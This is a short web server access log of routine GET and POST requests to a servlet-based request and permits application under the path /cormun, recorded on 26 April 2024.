181.212.47.137 - - [26/Apr/2024:11:32:03 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3823
190.171.141.106 - - [26/Apr/2024:11:32:06 -0300] "POST /cormun/servlet/trpermisosgoce?8626a29fb0374e4e8bc04992c2ffc63b,,gx-no-cache=1714141812530 HTTP/1.1" 200 11858
190.171.149.82 - - [26/Apr/2024:11:32:11 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7142
181.212.47.137 - - [26/Apr/2024:11:32:13 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 28376
190.171.149.82 - - [26/Apr/2024:11:32:13 -0300] "GET /cormun/static/gxcfg.js?20221129846531 HTTP/1.1" 200 953
186.103.157.42 - - [26/Apr/2024:11:32:20 -0300] "POST /cormun/servlet/solicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,INS,0,0,false,,gx-no-cache=1714142663594 HTTP/1.1" 200 93
186.103.157.42 - - [26/Apr/2024:11:32:20 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1005
186.103.157.42 - - [26/Apr/2024:11:32:21 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 13346
181.212.47.137 - - [26/Apr/2024:11:32:22 -0300] "POST /cormun/servlet/trsolicitudgral?e670f000380c3dd0fe06a1418bbd7bc0,,gx-no-cache=1714141838686 HTTP/1.1" 200 8792
186.103.157.42 - - [26/Apr/2024:11:32:26 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,gx-no-cache=1714142670017 HTTP/1.1" 200 10610
186.103.157.42 - - [26/Apr/2024:11:32:37 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,gx-no-cache=1714142680511 HTTP/1.1" 200 10619
